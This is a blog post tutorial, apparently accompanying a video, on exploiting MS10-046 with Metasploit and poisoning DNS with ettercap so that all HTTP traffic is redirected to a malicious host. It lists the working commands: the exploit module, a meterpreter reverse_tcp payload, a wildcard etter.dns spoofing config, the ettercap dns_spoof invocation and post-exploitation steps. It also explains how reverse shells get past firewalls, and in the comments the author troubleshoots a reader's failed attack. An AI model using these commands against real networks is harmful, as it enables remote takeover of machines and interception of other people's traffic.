MS10-046 Metasploit + ettercap DNS Spoof

Ok, so this is my first attempt at a video tutorial of me performing the MS10-046 exploit in the Metasploit framework, then using ettercap to poison DNS on my network so that I can redirect all http traffic to a malicious IP.I got nervous and messed up a few explanations, so I’m going to explain them here after you view the embedded Youtube video in all it’s glory! (PS Watch it in 720p, you can’t quite see the commands otherwise)

Ok, so, a few things:

reverse_tcp does not open a listening “server” or socket on the victim box, it will actually create the open listening socket on your attacker machine and direct the victim box to your LHOST setting.  I misspoke, like I said I was nervous, first video, etc. bind_tcp will open a listening socket on your victim machine and you can connect to it.

The reason we want to use a reverse_tcp payload when our victim PC has Windows Firewall or any firewall on it is because firewalls normally won’t just let any old traffic in, but will let most traffic out. Using bind_tcp, the victim box acts as a server and our attacking box acts as client, this is where we see the problem.  Using reverse_tcp, our attacking box acts as the server and the victim acts as the client.

“hackme-some random numbers, this must be the UID” No, it is not the UID, they are just some random numbers I assigned the VM when I made it. I don’t know why I said this.

Now we’re past that, here are the main commands I used:


use windows/browser/ms10_046_shortcut_icon_dllloader


set PAYLOAD windows/meterpreter/reverse_tcp




cat /usr/share/ettercap/etter.dns
*.com A
*.net A
*.org A
*.gov A

ettercap -T -q -i eth0 -P dns_spoof // //

MSF post exploitation:

sessions -i 1

use priv


I enjoyed making this video, so maybe you might see some more. If you have any questions feel free to comment on this or email me:

Direct video link:

Posted in Uncategorized
3 comments on “MS10-046 Metasploit + ettercap DNS Spoof
  1. Bob Hairstyles says:

    Do chickens think rubber humans are funny?

    g3k’s note: this is spam, but I had to approve it because it made me lol.

  2. Mahabir says:

    i tried but the meterpreter session not comming . everything went smoothly except the meterpreter session . pls help

    • g3k says:

      Mahabir, what operating system are you attempting this against? The biggest problem that people have after reading my tutorial or watching the video is they try it against Windows 7 and greater, when the exploit is only present in Windows XP.

1 Pings/Trackbacks for "MS10-046 Metasploit + ettercap DNS Spoof"
  1. […] This post was mentioned on Twitter by Lars, g3k. g3k said: Video and post describing what I did for MS10-046 in #Metasploit and ettercap. Feedback requested RT if you want […]

Leave a Reply

Your email address will not be published. Required fields are marked *